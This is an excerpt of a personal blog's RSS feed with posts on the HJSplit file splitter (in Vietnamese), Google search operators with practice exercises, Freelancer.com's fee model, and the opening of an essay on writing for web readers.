		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>Hướng dẫn dùng HjSplit và File Splitter &amp; Joiner</title>
		<link>http://ttdoanst.wordpress.com/2011/06/25/h%c6%b0%e1%bb%9bng-d%e1%ba%abn-dung-hjsplit-va-file-splitter-joiner/</link>
		<comments>http://ttdoanst.wordpress.com/2011/06/25/h%c6%b0%e1%bb%9bng-d%e1%ba%abn-dung-hjsplit-va-file-splitter-joiner/#comments</comments>
		<pubDate>Sat, 25 Jun 2011 14:54:29 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Hướng dẫn dùng HjSplit và File Splitter & Joiner]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=43</guid>
		<description><![CDATA[HJSplit là chương trình cắt nối tập tin miễn phí và thông dụng được viết bởi Freebyte.com, mà ko gặp bất kì xung đột nào với các chương trình khác. Nó chia tập tin dù cho nó ở bất kì định dạng hay dung lượng như thế nào đi nữa. Không cần cài đặt mà [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=43&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>HJSplit là chương trình cắt nối tập tin miễn phí và thông dụng được viết bởi Freebyte.com, mà ko gặp bất kì xung đột nào với các chương trình khác. Nó chia tập tin dù cho nó ở bất kì định dạng hay dung lượng như thế nào đi nữa. Không cần cài đặt mà ta chỉ việc kích hoạt &#8221; hjspilt.exe&#8221; và chương trình sẽ thực thi. Chương trình này có thể chia được tập tin có dung lượng lớn hơn 10GB!! HJSplit hoạt động độc lập, đáng tin cậy, đơn giản, nhẹ và dễ sử dụng. Nó ko cần cài đặt hay dính dáng đến đống thư viên DLL phức tạp, mà chỉ cần 1 tập tin exe duy nhất. Hệ quả rút ra được là nó có thể ung dung chạy trực tiếp từ đĩa mềm hay CD-Rom</p>
<p>HJSplit sẽ cho phép bạn chia các tập tin lớn thành những tập tin nhỏ hơn để dễ dàng chia sẻ và lưu trữ. Chẳng hạn như nó chia 1 tập tin 10GB thành các phần có dung lượng 640MB để có thể chép vào CD-rom bởi các trình ghi đĩa. Và lẽ dĩ nhiên HJSplit có thể nối các phần đã chia này thành file hoàn chỉnh giống hệt file gốc.</p>
<p>Mặt khác, bạn cũng có thể sử dụng HJJoin trong trường hợp này, vì nhỏ rất nhỏ gọn và chuyên dụng cho việc nối file</p>
<p>HJSplit làm việc trên nhiều nền HĐH (Windows XP, Vista, 2000, NT, 95, 98, ME, DOS, Amiga, Java, etc.). Tất cả phiên bản này đều tương thích lẫn nhau và cho phép trao đổi các tập tin giữa các HĐH khác nhau. Ví dụ như tập tin đã chia trên Amiga có thể nối lại trên Windows 2000 và Vice Versa</p>
<p>link: http://hotfile.com/dl/122147780/1995f0b/hjsplit.rar.html</p>
<p></strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/43/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=43&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2011/06/25/h%c6%b0%e1%bb%9bng-d%e1%ba%abn-dung-hjsplit-va-file-splitter-joiner/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>Google Guide &gt; Part I: Query Input &gt; Search Operators</title>
		<link>http://ttdoanst.wordpress.com/2010/11/26/google-guide-part-i-query-input-search-operators/</link>
		<comments>http://ttdoanst.wordpress.com/2010/11/26/google-guide-part-i-query-input-search-operators/#comments</comments>
		<pubDate>Fri, 26 Nov 2010 16:01:55 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=48</guid>
		<description><![CDATA[The following table lists the search operators that work with each Google search service. Click on an operator to jump to its description — or, to read about all of the operators, simply scroll down and read all of this page. Search Service Search Operators Web Search allinanchor:, allintext:, allintitle:, allinurl:, cache:, define:, filetype:, id:, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=48&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The following table lists the search operators that work with each Google search service. Click on an operator to jump to its description — or, to read about all of the operators, simply scroll down and read all of this page.<br />
Search Service 	Search Operators<br />
Web Search 	allinanchor:, allintext:, allintitle:, allinurl:, cache:, define:, filetype:, id:, inanchor:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, site:<br />
Image Search 	allintitle:, allinurl:, filetype:, inurl:, intitle:, site:<br />
Groups 	allintext:, allintitle:, author:, group:, insubject:, intext:, intitle:<br />
Directory 	allintext:, allintitle:, allinurl:, ext:, filetype:, intext:, intitle:, inurl:<br />
News 	allintext:, allintitle:, allinurl:, intext:, intitle:, inurl:, location:, source:<br />
Product Search 	allintext:, allintitle:</p>
<p>The following is an alphabetical list of the search operators. This list includes operators that are not officially supported by Google and not listed in Google’s online help.</p>
<p>    Note: Google may change how undocumented operators work or may eliminate them completely.</p>
<p>Each entry typically includes the syntax, the capabilities, and an example. Some of the search operators won’t work as intended if you put a space between the colon (:) and the subsequent query word. If you don’t care to check which search operators require no space after the colon, always place the keyword immediately next to the colon. Many search operators can appear anywhere in your query. In our examples, we place the search operator as far to the right as possible. We do this because the Advanced Search form writes queries in this way. Also, such a convention makes it clearer as to which operators are associated with which terms.</p>
<p>allinanchor:</p>
<p>    If you start your query with allinanchor:, Google restricts results to pages containing all query terms you specify in the anchor text on links to the page. For example, [ allinanchor: best museums sydney ] will return only pages in which the anchor text on links to the pages contain the words “best,” “museums,” and “sydney.”</p>
<p>    Anchor text is the text on a page that is linked to another web page or a different place on the current page. When you click on anchor text, you will be taken to the page or place on the page to which it is linked. When using allinanchor: in your query, do not include any other search operators. The functionality of allinanchor: is also available through the Advanced Web Search page, under Occurrences.<br />
allintext:</p>
<p>    If you start your query with allintext:, Google restricts results to those containing all the query terms you specify in the text of the page. For example, [ allintext: travel packing list ] will return only pages in which the words “travel,” “packing,” and “list” appear in the text of the page. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.<br />
allintitle:</p>
<p>    If you start your query with allintitle:, Google restricts results to those containing all the query terms you specify in the title. For example, [ allintitle: detect plagiarism ] will return only documents that contain the words “detect” and “plagiarism” in the title. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.</p>
<p>    The title of a webpage is usually displayed at the top of the browser window and in the first line of Google’s search results for a page. The author of a website specifies the title of a page with the HTML TITLE element. There’s only one title in a webpage. When using allintitle: in your query, do not include any other search operators. The functionality of allintitle: is also available through the Advanced Web Search page, under Occurrences.</p>
<p>    In Image Search, the operator allintitle: will return images in files whose names contain the terms that you specify.</p>
<p>    In Google News, the operator allintitle: will return articles whose titles include the terms you specify.<br />
allinurl:</p>
<p>    If you start your query with allinurl:, Google restricts results to those containing all the query terms you specify in the URL. For example, [ allinurl: google faq ] will return only documents that contain the words “google” and “faq” in the URL, such as “www.google.com/help/faq.html”. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.</p>
<p>    In URLs, words are often run together. They need not be run together when you’re using allinurl:.</p>
<p>    In Google News, the operator allinurl: will return articles whose titles include the terms you specify.</p>
<p>    The Uniform Resource Locator, more commonly known as URL, is the address that specifies the location of a file on the Internet. When using allinurl: in your query, do not include any other search operators. The functionality of allinurl: is also available through the Advanced Web Search page, under Occurrences.<br />
author:</p>
<p>    If you include author: in your query, Google will restrict your Google Groups results to include newsgroup articles by the author you specify. The author can be a full or partial name or email address. For example, [ children author:john author:doe ] or [ children author:doe@someaddress.com ] return articles that contain the word “children” written by John Doe or doe@someaddress.com.</p>
<p>    Google will search for exactly what you specify. If your query contains [ author:”John Doe” ] (with quotes), Google won’t find articles where the author is specified as “Doe, John.”<br />
cache:</p>
<p>    The query cache:url will display Google’s cached version of a web page, instead of the current version of the page. For example, [ cache:www.eff.org ] will show Google’s cached version of the Electronic Frontier Foundation home page.</p>
<p>        Note: Do not put a space between cache: and the URL (web address).</p>
<p>    On the cached version of a page, Google will highlight terms in your query that appear after the cache: search operator. For example, [ cache:www.pandemonia.com/flying/ fly diary ] will show Google’s cached version of Flight Diary in which Hamish Reid’s documents what’s involved in learning how to fly with the terms “fly” and “diary” highlighted.<br />
define:</p>
<p>    If you start your query with define:, Google shows definitions from pages on the web for the term that follows. This advanced search operator is useful for finding definitions of words, phrases, and acronyms. For example, [ define: blog ] will show definitions for “Blog” (weB LOG).<br />
ext:</p>
<p>    This is an undocumented alias for filetype:.<br />
filetype:</p>
<p>    If you include filetype:suffix in your query, Google will restrict the results to pages whose names end in suffix. For example, [ web page evaluation checklist filetype:pdf ] will return Adobe Acrobat pdf files that match the terms “web,” “page,” “evaluation,” and “checklist.” You can restrict the results to pages whose names end with pdf and doc by using the OR operator, e.g. [  email security filetype:pdf OR filetype:doc ].</p>
<p>    When you don’t specify a File Format in the Advanced Search Form or the filetype: operator, Google searches a variety of file formats; see the table in File Type Conversion.<br />
group:</p>
<p>    If you include group: in your query, Google will restrict your Google Groups results to newsgroup articles from certain groups or subareas. For example, [ sleep group:misc.kids.moderated ] will return articles in the group misc.kids.moderated that contain the word “sleep” and [ sleep group:misc.kids ] will return articles in the subarea misc.kids that contain the word “sleep.”<br />
id:</p>
<p>    This is an undocumented alias for info:.<br />
inanchor:</p>
<p>    If you include inanchor: in your query, Google will restrict the results to pages containing the query terms you specify in the anchor text or links to the page. For example, [ restaurants inanchor:gourmet ] will return pages in which the anchor text on links to the pages contain the word “gourmet” and the page contains the word “restaurants.”<br />
info:</p>
<p>    The query info:URL will present some information about the corresponding web page. For instance, [ info:gothotel.com ] will show information about the national hotel directory GotHotel.com home page.</p>
<p>        Note: There must be no space between the info: and the web page URL.</p>
<p>    This functionality can also be obtained by typing the web page URL directly into a Google search box.<br />
insubject:</p>
<p>    If you include insubject: in your query, Google will restrict articles in Google Groups to those that contain the terms you specify in the subject. For example, [ insubject:”falling asleep” ] will return Google Group articles that contain the phrase “falling asleep” in the subject.</p>
<p>    Equivalent to intitle:.<br />
intext:</p>
<p>    The query intext:term restricts results to documents containing term in the text. For instance, [ Hamish Reid intext:pandemonia ] will return documents that mention the word “pandemonia” in the text, and mention the names “Hamish” and “Reid” anywhere in the document (text or not).</p>
<p>        Note: There must be no space between the intext: and the following word.</p>
<p>    Putting intext: in front of every word in your query is equivalent to putting allintext: at the front of your query, e.g., [ intext:handsome intext:poets ] is the same as [ allintext: handsome poets ].<br />
intitle:</p>
<p>    The query intitle:term restricts results to documents containing term in the title. For instance, [ flu shot intitle:help ] will return documents that mention the word “help” in their titles, and mention the words “flu” and “shot” anywhere in the document (title or not).</p>
<p>        Note: There must be no space between the intitle: and the following word.</p>
<p>    Putting intitle: in front of every word in your query is equivalent to putting allintitle: at the front of your query, e.g., [ intitle:google intitle:search ] is the same as [ allintitle: google search ].<br />
inurl:</p>
<p>    If you include inurl: in your query, Google will restrict the results to documents containing that word in the URL. For instance, [ inurl:print site:www.googleguide.com ] searches for pages on Google Guide in which the URL contains the word “print.” It finds pdf files that are in the directory or folder named “print” on the Google Guide website. The query [ inurl:healthy eating ] will return documents that mention the words “healthy” in their URL, and mention the word “eating” anywhere in the document.</p>
<p>        Note: There must be no space between the inurl: and the following word.</p>
<p>    Putting inurl: in front of every word in your query is equivalent to putting allinurl: at the front of your query, e.g., [ inurl:healthy inurl:eating ] is the same as [ allinurl: healthy eating ].</p>
<p>    In URLs, words are often run together. They need not be run together when you’re using inurl:.<br />
link:</p>
<p>    The query link:URL shows pages that point to that URL. For example, to find pages that point to Google Guide’s home page, enter:</p>
<p>    [ link:www.googleguide.com ]</p>
<p>        Note: According to Google’s documentation, “you cannot combine a link: search with a regular keyword search.”</p>
<p>        Also note that when you combine link: with another advanced operator, Google may not return all the pages that match. The following queries should return lots of results, as you can see if you remove the -site: term in each of these queries.</p>
<p>    Find links to the Google home page not on Google’s own site.</p>
<p>    [ link:www.google.com -site:google.com ]</p>
<p>    Find links to the UK Owners Direct home page not on its own site.</p>
<p>    [ link:www.www.ownersdirect.co.uk -site:ownersdirect.co.uk ]<br />
location:</p>
<p>    If you include location: in your query on Google News, only articles from the location you specify will be returned. For example, [ queen location:canada ] will show articles that match the term “queen” from sites in Canada. Many other country names work; try them and see.</p>
<p>    Two-letter US state abbreviations match individual US states, and two-letter Canadian province abbreviations (like NS for Nova Scotia) also work — although some provinces don’t have many newspapers online, so you may not get many results. Some other two-letter abbreviations — such as UK for the United Kingdom — are also available.<br />
movie:</p>
<p>    If you include movie: in your query, Google will find movie-related information. For examples, see Google’s Blog.<br />
phonebook:</p>
<p>    If you start your query with phonebook:, Google shows all public U.S. resudence telephone listings (name, address, phone number) for the person you specify. For example, [ phonebook: John Doe New York NY ] will show phonebook listings of everyone named John Doe in New York, NY.<br />
related:</p>
<p>    The query related:URL will list web pages that are similar to the web page you specify. For instance, [ related:www.consumerreports.org ] will list web pages that are similar to the Consumer Reports home page.</p>
<p>        Note: Don’t include a space between the related: and the web page url.</p>
<p>    You can also find similar pages from the “Similar pages” link on Google’s main results page, and from the similar selector in the Page-Specific Search area of the Advanced Search page. If you expect to search frequently for similar pages, consider installing a GoogleScout browser button, which scouts for similar pages.<br />
site:</p>
<p>    If you include site: in your query, Google will restrict your search results to the site or domain you specify. For example, [ admissions site:www.lse.ac.uk ] will show admissions information from London School of Economics’ site and [ peace site:gov ] will find pages about peace within the .gov domain. You can specify a domain with or without a period, e.g., either as .gov or gov.</p>
<p>        Note: Do not include a space between the “site:” and the domain.</p>
<p>    You can use many of the search operators in conjunction with the basic search operators +, –, OR, and &#8221; &#8220;. For example, to find information on Windows security from all sites except microsoft.com, enter:</p>
<p>    [  windows security –site:microsoft.com  ]</p>
<p>    You can also restrict your results to a site or domain through the domains selector on the Advanced Search page.<br />
source:</p>
<p>    If you include source: in your query, Google News will restrict your search to articles from the news source with the ID you specify. For example, [ election source:new_york_times ] will return articles with the word “election” that appear in the New York Times.</p>
<p>    To find a news source ID, enter a query that includes a term and the name of the publication you’re seeking. You can also specify the publication name in the “news source” field in the Advanced News Search form. You’ll find the news source ID in the query box, following the source: search operator. For example, let’s say you enter the publication name Ha’aretz in the News Source box, then you click the Google Search button. The results page appears, and its search box contains [ peace source:ha_aretz__subscription_ ]. This means that the news source ID is ha_aretz__subscription_. This query will only return articles that include the word “peace” from the Israeli newspaper Ha’aretz.<br />
weather</p>
<p>    If you enter a query with the word weather and a city or location name, if Google recognizes the location, the forecast will appear at the top of the results page. Otherwise, your results will usually include links to sites with the weather conditions and forecast for that location.</p>
<p>    Since weather is not an advanced operator, there is no need to include a colon after the word. For example, [ weather Sunnyvale CA ] will return the weather for Sunnyvale, California and [ weather 94041 ] will return the weather for the city containing the zip code (US postal code) 94041, which is Mountain View, California.</p>
<p>The Google Guide Advanced Operator Quick Reference (www.googleguide.com/advanced_operators_reference.html) provides a nice summary of the search operators grouped by type. It includes search operators not yet documented by Google, e.g., allinanchor:, allintext:, author:, ext:, group:, id:, insubject:, intext:, intitle:, location:, phonebook:, and source:.</p>
<p>    Note: Google may change how undocumented operators work or eliminate them completely. If you notice problems or changes in Google’s undocumented operators, please let us know.</p>
<p>Exercises</p>
<p>This problem set is designed to give you experiences with search operators and practice with specifying more precisely what you’re seeking by using the Advanced Search form. For hints and answers to selected problems, see the Solutions page.</p>
<p>   1. Use the site: operator to search for armchairs on IKEA’s site, www.ikea.com.<br />
   2. Use the Advanced Search form to find the page whose title is “Some Ways to Detect Plagiarism.” When the title is entered in lowercase letters, the query box on the results page contains [allintitle:  “ways to detect plagiarism” ].<br />
   3. Find all pages on google.com but not on answers.google.com nor on directory.google.com whose titles include the words “FAQ” or “help.”<br />
   4. Use the link: operator to see who links to googleguide.com, your company’s website, or your favorite website.<br />
   5. Find pages whose titles include surfing that are not about surfing the World Wide Web.<br />
   6. Find out where the upcoming international conference on AIDS is being held.<br />
   7. How can you search for [ google help ] on Google Guide, www.googleguide.com, and on the UC Berkeley library website, www.lib.berkeley.edu?</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/48/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=48&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2010/11/26/google-guide-part-i-query-input-search-operators/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>What&#8217;s in Freelancer.com</title>
		<link>http://ttdoanst.wordpress.com/2010/11/26/whats-in-freelancer-com/</link>
		<comments>http://ttdoanst.wordpress.com/2010/11/26/whats-in-freelancer-com/#comments</comments>
		<pubDate>Fri, 26 Nov 2010 15:52:39 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=45</guid>
		<description><![CDATA[Freelancer.com is a website that provides an online job marketplace for freelance workers from around the world. Formerly known as GetAFreelancer.com, the company was founded in 2004 by Plendo Sweden, headed up by Magnus Tibell of Swedish web solutions company Innovate It[1]. GetAFreelancer.com was bought on the 7th May 2009[1] by the Australian company Ignition [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=45&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.freelancer.com/affiliates/ttdoan/"><img src="http://www.freelancer.com/img/affiliates/Banner-728x90_1.gif" width="728" height="90" alt="Freelance Jobs" border="0"></a></p>
<p>Freelancer.com is a website that provides an online job marketplace for freelance workers from around the world. Formerly known as GetAFreelancer.com, the company was founded in 2004 by Plendo Sweden, headed up by Magnus Tibell of Swedish web solutions company Innovate It[1]. GetAFreelancer.com was bought on the 7th May 2009[1] by the Australian company Ignition Networks[2]. The buyers changed the name to Freelancer.com in October 2009[3].</p>
<p>How Freelancer works</p>
<p>Users of Freelancer.com fall into two main categories: buyers and providers.<br />
 Buyers</p>
<p>Buyers are individuals or companies who wish to outsource their work. There may be several reasons for this: perhaps the job to be done is too small to warrant employing a full time member of staff, or it requires specialist knowledge or skill not pre-existing within the organisation. A significant draw is the opportunity to exploit global competition and have a project completed much more cheaply than it could be done at home[4]. The way that Freelancer.com works has been likened to eBay, but for jobs[5]. Buyers must register and set up a profile on Freelancer.com. There are 2 options available, either the “basic” free membership, or a “Gold” premium membership. With the basic membership, there are no monthly fees to pay, but the buyer must pay $3 or 3% of the total project fee (whichever is the greater) of each project they post to Freelancer.com. In addition, a $5 fee is taken when the project is posted, refundable upon selection of a provider. This deposit is to discourage the increasing number of “spam” buyers who post projects to garner interest from providers, then cancel the project and continue to operate it outside of Freelancer’s terms and conditions[4],[6]. The buyer is able to specify the budget range for the project with the brackets being $30 – 250 USD, $250 – 750 USD, $750 – 1500 USD, $1500 – 3000 USD, $3000 – 5000 USD, or &gt;$5000 USD. Based on this and the project description, the interested provider makes a bid, which is then forwarded to the buyer. The buyer is then able to review all the bids he or she receives and judge for themselves who they would like to select to complete the project[4].<br />
 Providers</p>
<p>Providers, or “freelancers”, are individuals or teams who wish to be hired for outsourced work. Individuals may be full or part time self-employed persons, or those who wish to make some extra money on an ad hoc basis. Some providers on Freelancer.com are in fact teams or agencies who bid for work to delegate out to one of their members[7]. Like buyers, providers also have a choice of either a basic account or a Gold membership. With a basic membership, providers pay no monthly fees but are charged $5 USD or 10% of the project fee when they are selected, whichever is the greater. Paying $24.95 USD per month for a Gold membership reduces the project commission fee to 3% and allows a provider to make up to 150 bids per month, instead of 30 as a basic member[6].<br />
 Completing a project</p>
<p>Once a buyer has selected a provider, they are each provided with the other’s contact details so that they are able to communicate freely with one another. It is up to the buyer and freelancer to mutually agree a timeframe for project completion and payment schedule. Payment may be made by transferring funds from the buyer’s Freelancer account to the provider’s, or may be conducted externally to Freelancer via PayPal, Moneybookers or another method of the buyer and provider’s choice. Payment outside of Freelancer’s system removes the ability for both buyer and provider to leave feedback for the other party[8].<br />
 FreelancerAPI</p>
<p>In April 2010, Freelancer.com announced the release of FreelancerAPI, an application programming interface that allows software to task humans with work to be done, rather than the traditional API which allows humans to program computers via software.[9].<br />
 Financing</p>
<p>Freelancer.com has been 100% bootstrapped to date. Startive Capital, a boutique venture capital fund and startup incubator based in Sydney, Australia, provided the financing for the acquisition of Freelancer.com by Ignition.[10],[11].</p>
<p><a href="http://www.freelancer.com/affiliates/ttdoan/"><img src="http://www.freelancer.com/img/affiliates/Banner-728x90_1.gif" width="728" height="90" alt="Freelance Jobs" border="0"></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/45/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=45&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2010/11/26/whats-in-freelancer-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>

		<media:content url="http://www.freelancer.com/img/affiliates/Banner-728x90_1.gif" medium="image">
			<media:title type="html">Freelance Jobs</media:title>
		</media:content>

		<media:content url="http://www.freelancer.com/img/affiliates/Banner-728x90_1.gif" medium="image">
			<media:title type="html">Freelance Jobs</media:title>
		</media:content>
	</item>
		<item>
		<title>How To Write For The Web</title>
		<link>http://ttdoanst.wordpress.com/2010/11/26/how-to-write-for-the-web/</link>
		<comments>http://ttdoanst.wordpress.com/2010/11/26/how-to-write-for-the-web/#comments</comments>
		<pubDate>Fri, 26 Nov 2010 15:45:35 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/?p=41</guid>
		<description><![CDATA[How To Write For The Web By Amrit Hallan Among the web’s myriad peculiarities, one is, the way people read online text. It took me a lot of time (being a writer who loves to read the greats like Dickens and Kafka) to realize how impatient and hurried the general web reader is. Most web [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=41&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>How To Write For The Web</strong></p>
<p><em>By Amrit Hallan</em><em></p>
<p>Among the web’s myriad peculiarities, one is, the way people read online text. It took me a lot of time (being a writer who loves to read the greats like Dickens and Kafka) to realize how impatient and hurried the general web reader is.</p>
<p>Most web readers do not read complete sentences and paragraphs, unless they are reading a white paper or a piece of literature. They generally scan the headlines, or the words and expressions that grab their attention. Web readers tend to scan text online and read text offline. They typically do not read a page from start to finish on the computer screen. Instead, they scan a site looking for relevant items and then print pages that contain the information they seek. You need to apply a style and method to your Web documents that accommodate this type of reading.</p>
<p>I’m not saying there are hard and fast rules for writing for the online audience, but if you take care of the following guidelines, you may find yourself on the comfortable side of the hedge.<br />
TRY TO BE CONCISE</p>
<p>As I mentioned above, an average web reader doesn’t read big text streams. Unlike a printed papyrus, the web is humanly limitless when it comes to seeking information. It’s all on the back of the reader’s mind that the moment he or she begins to feel bored, just a few clicks are required to go somewhere else.<br />
CONVERSE WITH YOUR READER</p>
<p>Write in a conversational tone whenever possible. Use lots of You’s, I’s and Me’s. Keep a free flow and keep throwing appealing and stimulating expressions at your reader. No, it doesn’t mean you create a nuisance or insult the sensibilities of your reader, but try to be as formal as your subject allows.</p>
<p>A few months back I used to write technical tutorials for a management portal. The chief editor had hired me as a freelance columnist because of my casual but incisive style. The senior management, however, objected to my style and suggested that I should tone down my humor and make the tutorials sound serious and bookish. While I wrote in my style, the portal got great response and the readers loved the tutorials. When they curbed my style, the popularity declined vertically, and soon, I got bored and stopped writing for them. They closed the web site last week because many subscribers asked them to refund the subscription money.</p>
<p>Lesson learnt: no matter what’s the field, a typical web reader does not read pedantic stuff. I don’t know why, but the web makes them funky.<br />
WRITE IN A LINEAR FASHION</p>
<p>Try not to divide a single topic among various pages. If the message is interesting and relevant, your web readers would like to read it on a single page no matter how long and bulky that page is. They don’t appreciate pressing the Backward and Forward buttons.</p>
<p>I have seen this myself, and know how irritating it is to having to go to various pages to read just one article or product description. Fine, the web readers prefer shorter pages, but it doesn’t mean if a paper consists of thousand pages then we should have to click thousand pages to read that paper. It’s better if all the content is on a single, linear, scrollable page.<br />
